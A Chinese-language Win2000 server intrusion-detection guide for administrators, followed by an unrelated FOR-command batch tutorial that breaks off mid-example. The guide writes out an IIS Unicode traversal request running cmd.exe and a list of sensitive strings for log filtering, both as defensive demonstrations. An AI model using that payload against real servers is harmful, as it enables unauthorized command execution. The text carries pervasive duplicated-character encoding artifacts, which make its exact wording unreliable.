經(jīng)過(guò)精心配置的Win2000服務(wù)器可以防御90%以上的入侵和滲透，但是，就象上一章結(jié)束時(shí)我所提到的：系統(tǒng)安全是一個(gè)連續(xù)的過(guò)程，隨著新漏洞的出現(xiàn)和服務(wù)器應(yīng)用的變化，系統(tǒng)的安全狀況也在不斷變化著；同時(shí)由于攻防是矛盾的統(tǒng)一體，道消魔長(zhǎng)和魔消道長(zhǎng)也在不斷的轉(zhuǎn)換中，因此，再高明的系統(tǒng)管理員也不能保證一臺(tái)正在提供服務(wù)的服務(wù)器長(zhǎng)時(shí)間絕對(duì)不被入侵。 　　所以，安全配置服務(wù)器并不是安全工作的結(jié)束，相反卻是漫長(zhǎng)乏味的安全工作的開始，本文我們將初步探討Win2000服務(wù)器入侵檢測(cè)的初步技巧，希望能幫助您長(zhǎng)期維護(hù)服務(wù)器的安全。 　　本文中所說(shuō)的入侵檢測(cè)指的是利用Win2000 Server自身的功能及系統(tǒng)管理員自己編寫的軟件/腳本進(jìn)行的檢測(cè)，使用防火墻（Firewall）或入侵監(jiān)測(cè)系統(tǒng)（IDS）的技巧并不在本文的討論范圍之內(nèi)。 　　現(xiàn)在假定：我們有一臺(tái)Win2000 Server的服務(wù)器，并且經(jīng)過(guò)了初步的安全配置（關(guān)于安全配置的詳情可以參閱Win2000 Server安全配置入門<一>），在這種情況下，大部分的入侵者將被拒之門外。（哈哈，我管理員可以回家睡大覺去了）慢著，我說(shuō)的是大部分，不是全部，經(jīng)過(guò)初步安全配置的服務(wù)器雖然可以防御絕大多數(shù)的Script kid（腳本族-只會(huì)用別人寫的程序入侵服務(wù)器的人），遇到了真正的高手，還是不堪一擊的。雖然說(shuō)真正的高手不會(huì)隨便進(jìn)入別人的服務(wù)器，但是也難保有幾個(gè)品行不端的邪派高手看上了你的服務(wù)器。（我真的這么衰么？）而且，在漏洞的發(fā)現(xiàn)與補(bǔ)丁的發(fā)布之間往往有一段時(shí)間的真空，任何知道漏洞資料的人都可以乘虛而入，這時(shí)，入侵檢測(cè)技術(shù)就顯得非常的重要。 　　入侵的檢測(cè)主要還是根據(jù)應(yīng)用來(lái)進(jìn)行，提供了相應(yīng)的服務(wù)就應(yīng)該有相應(yīng)的檢測(cè)分析系統(tǒng)來(lái)進(jìn)行保護(hù)，對(duì)于一般的主機(jī)來(lái)說(shuō)，主要應(yīng)該注意以下幾個(gè)方面： 　　1、 基于80端口入侵的檢測(cè) 　　WWW服務(wù)大概是最常見的服務(wù)之一了，而且由于這個(gè)服務(wù)面對(duì)廣大用戶，服務(wù)的流量和復(fù)雜度都很高，所以針對(duì)這個(gè)服務(wù)的漏洞和入侵技巧也最多。對(duì)于NT來(lái)說(shuō)，IIS一直是系統(tǒng)管理員比較頭疼的一部分（恨不得關(guān)了80端口），不過(guò)好在IIS自帶的日志功能從某種程度上可以成為入侵檢測(cè)的得力幫手。IIS自帶的日志文件默認(rèn)存放在System32/LogFiles目錄下，一般是按24小時(shí)滾動(dòng)的，在IIS管理器中可以對(duì)它進(jìn)行詳細(xì)的配置。（具體怎么配我不管你，不過(guò)你要是不詳細(xì)記錄，回頭查不到入侵者的IP可不要哭） 　　現(xiàn)在我們?cè)偌僭O(shè)（怎么老是假設(shè)呀，煩不煩？）別急呀，我不能為了寫這篇文章真的去黑掉一臺(tái)主機(jī)，所以只好假設(shè)了，我們假設(shè)一臺(tái)WEB服務(wù)器，開放了WWW服務(wù)，你是這臺(tái)服務(wù)器的系統(tǒng)管理員，已經(jīng)小心地配置了IIS，使用W3C擴(kuò)展的日志格式，并至少記錄了時(shí)間（Time）、客戶端IP（Client IP）、方法（Method）、URI資源(URI Stem)、URI查詢(URI Query)，協(xié)議狀態(tài)（Protocol Status)，我們用最近比較流行的Unicode漏洞來(lái)進(jìn)行分析：打開IE的窗口，在地址欄輸入：127.0.0.1/scripts/..%c1% 1c../winnt/system32/cmd.exe?/c+dir 默認(rèn)的情況下你可以看到目錄列表（什么？你已經(jīng)做過(guò)安全配置了，看不到？恢復(fù)默認(rèn)安裝，我們要做個(gè)實(shí)驗(yàn)），讓我們來(lái)看看IIS的日志都記錄了些什么，打開Ex010318.log（Ex代表W3C擴(kuò)展格式，后面的一串?dāng)?shù)字代表日志的記錄日期）：07:42:58 127.0.0.1 GET /scripts/..\../winnt/system32\cmd.exe /c+dir 200上面這行日志表示在格林威治時(shí)間07:42:58（就是北京時(shí)間23:42:58），有一個(gè)家伙（入侵者）從127.0.0.1的IP在你的機(jī)器上利用Unicode漏洞（%c1%1c被解碼為"\"，實(shí)際的情況會(huì)因?yàn)閃indows語(yǔ)言版本的不同而有略微的差別）運(yùn)行了cmd.exe，參數(shù)是/c dir，運(yùn)行結(jié)果成功（HTTP 200代表正確返回）。(哇，記錄得可真夠全的，以后不敢隨便亂玩Unicode了) 　　大多數(shù)情況下，IIS的日志會(huì)忠實(shí)地記錄它接收到的任何請(qǐng)求（也有特殊的不被IIS記錄的攻擊，這個(gè)我們以后再討論），所以，一個(gè)優(yōu)秀的系統(tǒng)管理員應(yīng)該擅長(zhǎng)利用這點(diǎn)來(lái)發(fā)現(xiàn)入侵的企圖，從而保護(hù)自己的系統(tǒng)。但是，IIS的日志動(dòng)輒數(shù)十兆、流量大的網(wǎng)站甚至數(shù)十G，人工檢查幾乎沒有可能，唯一的選擇就是使用日志分析軟件，用任何語(yǔ)言編寫一個(gè)日志分析軟件（其實(shí)就是文本過(guò)濾器）都非常簡(jiǎn)單，不過(guò)考慮到一些實(shí)際情況（比如管理員不會(huì)寫程序，或者服務(wù)器上一時(shí)找不到日志分析軟件），我可以告訴大家一個(gè)簡(jiǎn)單的方法，比方說(shuō)你想知道有沒有人從80端口上試圖取得你的Global.asa文件，可以使用以下的CMD命令：find "Global.asa" ex010318.log /i這個(gè)命令使用的是NT自帶的find.exe工具（所以不怕緊急情況找不著），可以輕松的從文本文件中找到你想過(guò)濾的字符串，"Global.asa"是需要查詢的字符串，ex010318.log是待過(guò)濾的文本文件，/i代表忽略大小寫。因?yàn)槲覠o(wú)意把這篇文章寫成微軟的Help文檔，所以關(guān)于這個(gè)命令的其他參數(shù)以及它的增強(qiáng)版FindStr.exe的用法請(qǐng)去查看Win2000的幫助文件。 　　無(wú)論是基于日志分析軟件或者是Find命令，你都可以建立一張敏感字符串列表，包含已有的IIS漏洞（比如"+.htr"）以及未來(lái)將要出現(xiàn)的漏洞可能會(huì)調(diào)用的資源（比如Global.asa或者cmd.exe），通過(guò)過(guò)濾這張不斷更新的字符串表，一定可以盡早了解入侵者的行動(dòng)。 　　需要提醒的是，使用任何日志分析軟件都會(huì)占用一定的系統(tǒng)資源，因此，對(duì)于IIS日志分析這樣低優(yōu)先級(jí)的任務(wù)，放在夜里空閑時(shí)自動(dòng)執(zhí)行會(huì)比較合適，如果再寫一段腳本把過(guò)濾后的可疑文本發(fā)送給系統(tǒng)管理員，那就更加完美了。同時(shí)，如果敏感字符串表較大，過(guò)濾策略復(fù)雜，我建議還是用C寫一個(gè)專用程序會(huì)比較合算。 　2、 基于安全日志的檢測(cè) 　　通過(guò)基于IIS日志的入侵監(jiān)測(cè)，我們能提前知道窺伺者的行蹤（如果你處理失當(dāng)，窺伺者隨時(shí)會(huì)變成入侵者），但是IIS日志不是萬(wàn)能的，它在某種情況下甚至不能記錄來(lái)自80端口的入侵，根據(jù)我對(duì)IIS日志系統(tǒng)的分析，IIS只有在一個(gè)請(qǐng)求完成后才會(huì)寫入日志，換言之，如果一個(gè)請(qǐng)求中途失敗，日志文件中是不會(huì)有它的蹤影的（這里的中途失敗并不是指發(fā)生HTTP400錯(cuò)誤這樣的情況，而是從TCP層上沒有完成HTTP請(qǐng)求，例如在POST大量數(shù)據(jù)時(shí)異常中斷），對(duì)于入侵者來(lái)說(shuō)，就有可能繞過(guò)日志系統(tǒng)完成大量的活動(dòng)。 　　而且，對(duì)于非80 Only的主機(jī)，入侵者也可以從其它的服務(wù)進(jìn)入服務(wù)器，因此，建立一套完整的安全監(jiān)測(cè)系統(tǒng)是非常必要的。 　　Win2000自帶了相當(dāng)強(qiáng)大的安全日志系統(tǒng)，從用戶登錄到特權(quán)的使用都有非常詳細(xì)的記錄，可惜的是，默認(rèn)安裝下安全審核是關(guān)閉的，以至于一些主機(jī)被黑后根本沒法追蹤入侵者。所以，我們要做的第一步是在管理工具-本地安全策略-本地策略-審核策略中打開必要的審核，一般來(lái)說(shuō)，登錄事件與賬戶管理是我們最關(guān)心的事件，同時(shí)打開成功和失敗審核非常必要，其他的審核也要打開失敗審核，這樣可以使得入侵者步步維艱，一不小心就會(huì)露出馬腳。僅僅打開安全審核并沒有完全解決問題，如果沒有很好的配置安全日志的大小及覆蓋方式，一個(gè)老練的入侵者就能夠通過(guò)洪水般的偽造入侵請(qǐng)求覆蓋掉他真正的行蹤。通常情況下，將安全日志的大小指定為50MB并且只允許覆蓋7天前的日志可以避免上述情況的出現(xiàn)。 　　設(shè)置了安全日志卻不去檢查跟沒有設(shè)置安全日志幾乎一樣糟糕（唯一的優(yōu)點(diǎn)是被黑了以后可以追查入侵者），所以，制定一個(gè)安全日志的檢查機(jī)制也是非常重要的，作為安全日志，推薦的檢查時(shí)間是每天上午，這是因?yàn)椋肭终呦矚g夜間行動(dòng)（速度快呀，要不你入侵到一半的時(shí)候連不上了，那可是哭都哭不出來(lái)）上午上班第一件事正好看看日志有沒有異常，然后就可以放心去做其他的事了。如果你喜歡，也可以編寫腳本每天把安全日志作為郵件發(fā)送給你（別太相信這個(gè)了，要是哪個(gè)高手上去改了你的腳本，每天發(fā)送"平安無(wú)事"……） 　　除了安全日志，系統(tǒng)日志和應(yīng)用程序日志也是非常好的輔助監(jiān)測(cè)工具，一般來(lái)說(shuō)，入侵者除了在安全日志中留下痕跡（如果他拿到了Admin權(quán)限，那么他一定會(huì)去清除痕跡的），在系統(tǒng)和應(yīng)用程序日志中也會(huì)留下蛛絲馬跡，作為系統(tǒng)管理員，要有不放過(guò)任何異常的態(tài)度，這樣入侵者就很難隱藏他們的行蹤。 　　3、文件訪問日志與關(guān)鍵文件保護(hù) 　　除了系統(tǒng)默認(rèn)的安全審核外，對(duì)于關(guān)鍵的文件，我們還要加設(shè)文件訪問日志，記錄對(duì)他們的訪問。 　　文件訪問有很多的選項(xiàng)：訪問、修改、執(zhí)行、新建、屬性更改......一般來(lái)說(shuō)，關(guān)注訪問和修改就能起到很大的監(jiān)視作用。 　　例如，如果我們監(jiān)視了系統(tǒng)目錄的修改、創(chuàng)建，甚至部分重要文件的訪問（例如cmd.exe, net.exe，system32目錄），那么，入侵者就很難安放后門而不引起我們的注意，要注意的是，監(jiān)視的關(guān)鍵文件和項(xiàng)目不能太多，否則不僅增加系統(tǒng)負(fù)擔(dān)，還會(huì)擾亂日常的日志監(jiān)測(cè)工作（哪個(gè)系統(tǒng)管理員有耐心每天看四、五千條垃圾日志？） 　　關(guān)鍵文件不僅僅指的是系統(tǒng)文件，還包括有可能對(duì)系統(tǒng)管理員/其他用戶構(gòu)成危害的任何文件，例如系統(tǒng)管理員的配置、桌面文件等等，這些都是有可能用來(lái)竊取系統(tǒng)管理員資料/密碼的。 4、 進(jìn)程監(jiān)控 　　進(jìn)程監(jiān)控技術(shù)是追蹤木馬后門的另一個(gè)有力武器，90%以上的木馬和后門是以進(jìn)程的形式存在的（也有以其他形式存在的木馬，參見《揭開木馬的神秘面紗三》），作為系統(tǒng)管理員，了解服務(wù)器上運(yùn)行的每個(gè)進(jìn)程是職責(zé)之一（否則不要說(shuō)安全，連系統(tǒng)優(yōu)化都沒有辦法做），做一份每臺(tái)服務(wù)器運(yùn)行進(jìn)程的列表非常必要，能幫助管理員一眼就發(fā)現(xiàn)入侵進(jìn)程，異常的用戶進(jìn)程或者異常的資源占用都有可能是非法進(jìn)程。除了進(jìn)程外，DLL也是危險(xiǎn)的東西，例如把原本是exe類型的木馬改寫為dll后，使用rundll32運(yùn)行就比較具有迷惑性。 　　5、 注冊(cè)表校驗(yàn) 　　一般來(lái)說(shuō)，木馬或者后門都會(huì)利用注冊(cè)表來(lái)再次運(yùn)行自己，所以，校驗(yàn)注冊(cè)表來(lái)發(fā)現(xiàn)入侵也是常用的手法之一。一般來(lái)說(shuō)，如果一個(gè)入侵者只懂得使用流行的木馬，那么由于普通木馬只能寫入特定的幾個(gè)鍵值（比如Run、Runonce等等），查找起來(lái)是相對(duì)容易的，但是對(duì)于可以自己編寫/改寫木馬的人來(lái)說(shuō)，注冊(cè)表的任何地方都可以藏身，靠手工查找就沒有可能了。（注冊(cè)表藏身千變?nèi)f化，例如需要特別提出來(lái)的FakeGina技術(shù)，這種利用WINNT外嵌登錄DLL（Ginadll）來(lái)獲得用戶密碼的方法最近比較流行，一旦中招，登錄用戶的密碼就會(huì)被記錄無(wú)遺，具體的預(yù)防方法我這里就不介紹了。）應(yīng)對(duì)的方法是監(jiān)控注冊(cè)表的任何改動(dòng)，這樣改寫注冊(cè)表的木馬就沒有辦法遁形了。監(jiān)控注冊(cè)表的軟件非常多，很多追查木馬的軟件都帶有這樣的功能，一個(gè)監(jiān)控軟件加上定期對(duì)注冊(cè)表進(jìn)行備份，萬(wàn)一注冊(cè)表被非授權(quán)修改，系統(tǒng)管理員也能在最短的時(shí)間內(nèi)恢復(fù)。 　　6、端口監(jiān)控 　　雖然說(shuō)不使用端口的木馬已經(jīng)出現(xiàn)，但是大部分的后門和木馬還是使用TCP連接的，監(jiān)控端口的狀況對(duì)于由于種種原因不能封鎖端口的主機(jī)來(lái)說(shuō)就是非常重要的了，我們這里不談使用NDIS網(wǎng)卡高級(jí)編程的IDS系統(tǒng)，對(duì)于系統(tǒng)管理員來(lái)說(shuō)，了解自己服務(wù)器上開放的端口甚至比對(duì)進(jìn)程的監(jiān)控更加重要，常常使用netstat查看服務(wù)器的端口狀況是一個(gè)良好的習(xí)慣，但是并不能24小時(shí)這樣做，而且NT的安全日志有一個(gè)壞習(xí)慣，喜歡記錄機(jī)器名而不是IP（不知道比爾蓋子怎么想的），如果你既沒有防火墻又沒有入侵檢測(cè)軟件，倒是可以用腳本來(lái)進(jìn)行IP日志記錄的，看著這個(gè)命令： netstat -n -p tcp 10>>Netstat.log,這個(gè)命令每10秒鐘自動(dòng)查看一次TCP的連接狀況，基于這個(gè)命令我們做一個(gè)Netlog.bat文件: time /t>>Netstat.log Netstat -n -p tcp 10>>Netstat.log 　　這個(gè)腳本將會(huì)自動(dòng)記錄時(shí)間和TCP連接狀態(tài)，需要注意的是：如果網(wǎng)站訪問量比較大，這樣的操作是需要消耗一定的CPU時(shí)間的，而且日志文件將越來(lái)越大，所以請(qǐng)慎之又慎。（要是做個(gè)腳本就完美無(wú)缺，誰(shuí)去買防火墻？:） 　　一旦發(fā)現(xiàn)異常的端口，可以使用特殊的程序來(lái)關(guān)聯(lián)端口、可執(zhí)行文件和進(jìn)程(如inzider就有這樣的功能，它可以發(fā)現(xiàn)服務(wù)器監(jiān)聽的端口并找出與該端口關(guān)聯(lián)的文件，inzider可以從http://www.nttoolbox.com下載到)，這樣無(wú)論是使用TCP還是UDP的木馬都無(wú)處藏身。 7、終端服務(wù)的日志監(jiān)控 　　單獨(dú)將終端服務(wù)（Terminal Service）的日志監(jiān)控分列出來(lái)是有原因的，微軟Win2000服務(wù)器版中自帶的終端服務(wù)Terminal Service是一個(gè)基于遠(yuǎn)程桌面協(xié)議（RDP）的工具，它的速度非常快，也很穩(wěn)定，可以成為一個(gè)很好的遠(yuǎn)程管理軟件，但是因?yàn)檫@個(gè)軟件功能強(qiáng)大而且只受到密碼的保護(hù)，所以也非常的危險(xiǎn)，一旦入侵者擁有了管理員密碼，就能夠象本機(jī)一樣操作遠(yuǎn)程服務(wù)器（不需要高深的NT命令行技巧，不需要編寫特殊的腳本和程序，只要會(huì)用鼠標(biāo)就能進(jìn)行一切系統(tǒng)管理操作，實(shí)在是太方便、也實(shí)在是太可怕了）。雖然很多人都在使用終端服務(wù)來(lái)進(jìn)行遠(yuǎn)程管理，但是，并不是人人都知道如何對(duì)終端服務(wù)進(jìn)行審核，大多數(shù)的終端服務(wù)器上并沒有打開終端登錄的日志，其實(shí)打開日志審核是很容易的，在管理工具中打開遠(yuǎn)程控制服務(wù)配置（Terminal Service Configration），點(diǎn)擊"連接"，右擊你想配置的RDP服務(wù)（比如 RDP-TCP(Microsoft RDP 5.0)，選中書簽"權(quán)限"，點(diǎn)擊左下角的"高級(jí)"，看見上面那個(gè)"審核"了么？我們來(lái)加入一個(gè)Everyone組，這代表所有的用戶，然后審核他的"連接"、"斷開"、"注銷"的成功和"登錄"的成功和失敗就足夠了，審核太多了反而不好，這個(gè)審核是記錄在安全日志中的，可以從"管理工具"->"日志查看器"中查看。現(xiàn)在什么人什么時(shí)候登錄我都一清二楚了，可是美中不足的是：這個(gè)破爛玩藝居然不記錄客戶端的IP（只能查看在線用戶的IP），而是華而不實(shí)的記錄什么機(jī)器名，倒！要是別人起個(gè)PIG的機(jī)器名你只好受他的嘲弄了，不知道微軟是怎么想的，看來(lái)還是不能完全依賴微軟呀，我們自己來(lái)吧？寫個(gè)程序，一切搞定，你會(huì)C么？不會(huì)？VB呢？也不會(huì)？Delphi？……什么？你什么編程語(yǔ)言都不會(huì)？我倒，畢竟系統(tǒng)管理員不是程序員呀，別急別急，我給你想辦法，我們來(lái)建立一個(gè)bat文件，叫做TSLog.bat，這個(gè)文件用來(lái)記錄登錄者的IP，內(nèi)容如下： time /t >>TSLog.log netstat -n -p tcp | find ":3389">>TSLog.log start Explorer 　　我來(lái)解釋一下這個(gè)文件的含義： 　　第一行是記錄用戶登錄的時(shí)間，time /t的意思是直接返回系統(tǒng)時(shí)間（如果不加/t，系統(tǒng)會(huì)等待你輸入新的時(shí)間），然后我們用追加符號(hào)">>"把這個(gè)時(shí)間記入TSLog.log作為日志的時(shí)間字段； 　　第二行是記錄用戶的IP地址，netstat是用來(lái)顯示當(dāng)前網(wǎng)絡(luò)連接狀況的命令，-n表示顯示IP和端口而不是域名、協(xié)議，-ptcp是只顯示tcp協(xié)議，然后我們用管道符號(hào)"|"把這個(gè)命令的結(jié)果輸出給find命令，從輸出結(jié)果中查找包含":3389"的行（這就是我們要的客戶的IP所在的行，如果你更改了終端服務(wù)的端口，這個(gè)數(shù)值也要作相應(yīng)的更改），最后我們同樣把這個(gè)結(jié)果重定向到日志文件TSLog.log中去，于是在SLog.log文件中，記錄格式如下： 22:40 TCP　　192.168.12.28:3389　　192.168.10.123:4903　　　ESTABLISHED 22:54 TCP　　192.168.12.28:3389　　 192.168.12.29:1039　　　ESTABLISHED 　　也就是說(shuō)只要這個(gè)TSLog.bat文件一運(yùn)行，所有連在3389端口上的IP都會(huì)被記錄，那么如何讓這個(gè)批處理文件自動(dòng)運(yùn)行呢？我們知道，終端服務(wù)允許我們?yōu)橛脩糇远x起始的程序，在終端服務(wù)配置中，我們覆蓋用戶的登錄腳本設(shè)置并指定TSLog.bat為用戶登錄時(shí)需要打開的腳本，這樣每個(gè)用戶登錄后都必須執(zhí)行這個(gè)腳本，因?yàn)槟J(rèn)的腳本（相當(dāng)于shell環(huán)境）是Explorer（資源管理器），所以我在TSLog.bat的最后一行加上了啟動(dòng)Explorer的命令startExplorer，如果不加這一行命令，用戶是沒有辦法進(jìn)入桌面的！當(dāng)然，如果你只需要給用戶特定的Shell： 　　例如cmd.exe或者word.exe你也可以把start Explorer替換成任意的shell。這個(gè)腳本也可以有其他的寫法，作為系統(tǒng)管理員，你完全可以自由發(fā)揮你的想象力、自由利用自己的資源，例如寫一個(gè)腳本把每個(gè)登錄用戶的IP發(fā)送到自己的信箱對(duì)于重要的服務(wù)器也是一個(gè)很好的方法。正常情況下一般的用戶沒有查看終端服務(wù)設(shè)置的權(quán)限，所以他不會(huì)知道你對(duì)登錄進(jìn)行了IP審核，只要把TSLog.bat文件和TSLog.log文件放在比較隱蔽的目錄里就足夠了，不過(guò)需要注意的是這只是一個(gè)簡(jiǎn)單的終端服務(wù)日志策略，并沒有太多的安全保障措施和權(quán)限機(jī)制，如果服務(wù)器有更高的安全要求，那還是需要通過(guò)編程或購(gòu)買入侵監(jiān)測(cè)軟件來(lái)完成的。 　　8、陷阱技術(shù) 　　早期的陷阱技術(shù)只是一個(gè)偽裝的端口服務(wù)用來(lái)監(jiān)測(cè)掃描，隨著矛和盾的不斷升級(jí)，現(xiàn)在的陷阱服務(wù)或者陷阱主機(jī)已經(jīng)越來(lái)越完善，越來(lái)越象真正的服務(wù)，不僅能截獲半開式掃描，還能偽裝服務(wù)的回應(yīng)并記錄入侵者的行為，從而幫助判斷入侵者的身份。 　　我本人對(duì)于陷阱技術(shù)并不是非常感興趣，一來(lái)從技術(shù)人員角度來(lái)說(shuō)，低調(diào)行事更符合安全的原則；二來(lái)陷阱主機(jī)反而成為入侵者跳板的情況并不僅僅出現(xiàn)在小說(shuō)中，在現(xiàn)實(shí)生活中也屢見不鮮，如果架設(shè)了陷阱反而被用來(lái)入侵，那真是偷雞不成了。 　　記得CoolFire說(shuō)過(guò)一句話，可以用來(lái)作為對(duì)陷阱技術(shù)介紹的一個(gè)結(jié)束：在不了解情況時(shí)，不要隨便進(jìn)入別人的系統(tǒng)，因?yàn)槟阌肋h(yuǎn)不能事先知道系統(tǒng)管理員是真的白癡或者偽裝成白癡的天才...... 　　入侵監(jiān)測(cè)的初步介紹就到這里，在實(shí)際運(yùn)用中，系統(tǒng)管理員對(duì)基礎(chǔ)知識(shí)掌握的情況直接關(guān)系到他的安全敏感度，只有身經(jīng)百戰(zhàn)而又知識(shí)豐富、仔細(xì)小心的系統(tǒng)管理員才能從一點(diǎn)點(diǎn)的蛛絲馬跡中發(fā)現(xiàn)入侵者的影子，未雨綢繆，扼殺入侵的行動(dòng)。

以前常覺得DOS的命令行功能太弱，無(wú)法象UNIX一樣可以用命令行完成非常復(fù)雜的操作。實(shí)際上，當(dāng)MS從WIN2K開始將命令行增強(qiáng)后，已經(jīng)借鑒了相當(dāng)多UNIX的優(yōu)點(diǎn)，雖然還無(wú)法做到象UNIX那么靈活，但已可完成絕大多數(shù)的任務(wù)，比如用&&和||連接兩個(gè)（或更多）命令，由前一個(gè)的返回值來(lái)決定下一個(gè)是否執(zhí)行，等等。而在這些增強(qiáng)中，最明顯的，就是FOR命令。

舉個(gè)例子，用適當(dāng)?shù)膮?shù)，可用FOR命令將 date /t 的輸出 從 "Sat 07/13/2002" 變成你想要的格式，比如， "2002-07-13"：



c:\>for /f "tokens=2,3,4 delims=/ " %a in ('date /t') do @echo %c-%a-%b
2002-07-13


該例將在（3）中詳細(xì)說(shuō)明。

0. 基本應(yīng)用

簡(jiǎn)單說(shuō)，F(xiàn)OR是個(gè)循環(huán)，可以用你指定的循環(huán)范圍生成一系列命令。最簡(jiǎn)單的例子，就是人工指定循環(huán)范圍，然后對(duì)每個(gè)值執(zhí)行指定的命令。例如，想快速報(bào)告每個(gè)硬盤分區(qū)的剩余空間：



for %a in (c: d: e: f do @dir %a\ | find "bytes free"


將輸出：


8 Dir(s) 1,361,334,272 bytes free
15 Dir(s) 8,505,581,568 bytes free
12 Dir(s) 12,975,149,056 bytes free
7 Dir(s) 11,658,854,400 bytes free


用它可以使一些不支持通配符的命令對(duì)一系列文件進(jìn)行操作。在WIN9X中，TYPE命令（顯示文件內(nèi)容）是不支持*.txt這種格式的（WIN2K開始TYPE已支持通配）。遇到類似情況就可以用FOR：



for %a in (*.txt) do type %a


這些還不是FOR最強(qiáng)大的功能。我認(rèn)為它最強(qiáng)大的功能，表現(xiàn)在以下這些高級(jí)應(yīng)用：


1. 可以用 /r 參數(shù)遍歷整個(gè)目錄樹

2. 可以用 /f 參數(shù)將文本文件內(nèi)容作為循環(huán)范圍

3. 可以用 /f 參數(shù)將某一命令執(zhí)行結(jié)果作為循環(huán)范圍

4. 可以用 %~ 操作符將文件名分離成文件名、擴(kuò)展名、盤符等獨(dú)立部分


現(xiàn)分別舉例說(shuō)明如下：

1. 用 /r 遍歷目錄樹

當(dāng)用 *.* 或 *.txt 等文件名通配符作為 for /r 的循環(huán)范圍時(shí)，可以對(duì)當(dāng)前目錄下所有文件（包括子目錄里面的文件）進(jìn)行操作。舉個(gè)例子，你想在當(dāng)前目錄的所有txt文件（包括子目錄）內(nèi)容中查找"bluebear"字樣，但由于find本身不能遍歷子目錄，所以我們用for:



for /r . %a in (*.txt) do @find "bluebear" %a


find 前面的 @ 只是讓輸出結(jié)果不包括 find 命令本身。這是DOS很早就有的功能。和FOR無(wú)關(guān)。

當(dāng)用 . 作為循環(huán)范圍時(shí)，for 只將子目錄的結(jié)構(gòu)（目錄名）作為循環(huán)范圍，而不包括里面的文件。有點(diǎn)象 TREE 命令，不過(guò)側(cè)重點(diǎn)不同。TREE 的重點(diǎn)是用很漂亮易讀的格式輸出，而FOR的輸出適合一些自動(dòng)任務(wù)，例如，我們都知道用CVS管理的項(xiàng)目中，每個(gè)子目錄下都會(huì)有一個(gè)CVS目錄，有時(shí)在軟件發(fā)行時(shí)我們想把這些CVS目錄全部去掉：



for /r . %a in (.) do @if exist %a\CVS rd /s /q %a\CVS


先用 if exist 判斷一下，是因?yàn)?for 只是機(jī)械的對(duì)每個(gè)目錄進(jìn)行列舉，如果有些目錄下面沒有CVS也會(huì)被執(zhí)行到。用 if exist 判斷一下比較安全。

這種刪除命令威力太大，請(qǐng)小心使用。最好是在真正執(zhí)行以上的刪除命令前，將 rd /s /q 換成 @echo 先列出要?jiǎng)h出的目錄，確認(rèn)無(wú)誤后再換回rd /s /q：



for /r . %a in (.) do @if exist %a\CVS @echo %a\CVS


可能目錄中會(huì)多出一層 "."，比如 c:\proj\release\.\CVS ，但不會(huì)影響命令的執(zhí)行效果。

2. 將某一文件內(nèi)容或命令執(zhí)行結(jié)果作為循環(huán)范圍：

假如你有一個(gè)文件 todel.txt，里面是所有要?jiǎng)h除的文件列表，現(xiàn)在你想將里面列出的每個(gè)文件都刪掉。假設(shè)這個(gè)文件是每個(gè)文件名占一行，象這樣：



c:\temp\a1.txt
c:\temp\a2.txt
c:\temp\subdir\b3.txt
c:\temp\subdir\b4.txt


那么可以用FOR來(lái)完成：



for /f %a in (todel.txt) do del %a


這個(gè)命令還可以更強(qiáng)大。比如你的 todel.txt 并不是象上面例子那么干凈，而是由DIR直接生成，有一些沒用的信息，比如這樣：



Volume in drive D is DATA
Volume Serial Number is C47C-9908

Directory of D:\tmp

09/26/2001 12:50 PM 18,426 alg0925.txt
12/02/2001 04:29 AM 795 bsample.txt
04/11/2002 04:18 AM 2,043 invitation.txt
4 File(s) 25,651 bytes
0 Dir(s) 4,060,700,672 bytes free


for 仍然可以解出其中的文件名并進(jìn)行操作：



for /f "skip=5 tokens=5" %a in (todel.txt) do @if exist %a DEL %a


當(dāng)然，上面這個(gè)命令是在進(jìn)行刪除，如果你只是想看看哪些文件將被操作，把DEL換成echo:



for /f "skip=5 tokens=5" %a in (todel.txt) do @if exist %a echo %a


你將看到：


alg0925.txt
bsample.txt
invitation.txt


skip=5表示跳過(guò)前5行（就是DIR輸出的頭部信息），tokens=5表示將每行的第5列作為循環(huán)值放入%a，正好是文件名。在這里我加了一個(gè)文件存在判斷，是因?yàn)樽詈笠恍械?free"剛好也是第5列，目前還想不出好的辦法來(lái)濾掉最后兩行，所以檢查一下可保萬(wàn)無(wú)一失。

3. 可以用 /f 參數(shù)將某一命令執(zhí)行結(jié)果作為循環(huán)范圍

非常有用的功能。比如，我們想知道目前的環(huán)境變量有哪些名字（我們只要名字，不要值）。可是SET命令的輸出是“名字=值”的格式，現(xiàn)在可以用FOR來(lái)只取得名字部分：



FOR /F "delims==" %i IN ('set') DO @echo %i



將看到：



ALLUSERSPROFILE
APPDATA
CLASSPATH
CommonProgramFiles
COMPUTERNAME
ComSpec
dircmd
HOMEDRIVE
......


這里是將set命令執(zhí)行的結(jié)果拿來(lái)作為循環(huán)范圍。delims==表示用=作為分隔符，由于FOR /F默認(rèn)是用每行第一個(gè)TOKEN，所以可以分離出變量名。如果是想僅列出值：



FOR /F "delims== tokens=2" %i IN ('set') DO @echo %i


tokens=2和前例相同，表示將第二列（由=作為分隔符）作為循環(huán)值。

再來(lái)個(gè)更有用的例子：

我們知道 date /t （/t表示不要詢問用戶輸入）的輸出是象這樣的：



Sat 07/13/2002


現(xiàn)在我想分離出日期部分，也就是13：



for /f "tokens=3 delims=/ " %a in ('date /t') do @echo %a


實(shí)際上把 tokens后面換成1,2,3或4，你將分別得到Sat, 07, 13和2002。注意delims=/后面還有個(gè)空格，表示/和空格都是分隔符。由于這個(gè)空格delims必須是/f選項(xiàng)的最后一項(xiàng)。

再靈活一點(diǎn)，象本文開頭提到的，將日期用2002-07-13的格式輸出：



for /f "tokens=2,3,4 delims=/ " %a in ('date /t') do @echo %c-%a-%b


當(dāng)tokens后跟多個(gè)值時(shí)，將分別映射到%a, %b, %c等。實(shí)際上跟你指定的變量有關(guān)，如果你指定的是 %i, 它們就會(huì)用%i, %j, %k等。

靈活應(yīng)用這一點(diǎn)，幾乎沒有做不了的事。

4. 可以用 %~ 操作符將文件名分離成文件名、擴(kuò)展名、盤符等獨(dú)立部分

這個(gè)比較簡(jiǎn)單，就是說(shuō)將循環(huán)變量的值自動(dòng)分離成只要文件名，只要擴(kuò)展名，或只要盤符等等。

例：要將 c:\mp3下所有mp3的歌名列出，如果用一般的 dir /b/s 或 for /r ，將會(huì)是這樣：



g:\mp3\Archived\05-18-01-A\游鴻明-下沙\游鴻明-01 下沙.mp3
g:\mp3\Archived\05-18-01-A\游鴻明-下沙\游鴻明-02 21個(gè)人.mp3
......
g:\mp3\Archived\05-18-01-A\王菲-寓言\王菲-阿修羅.mp3
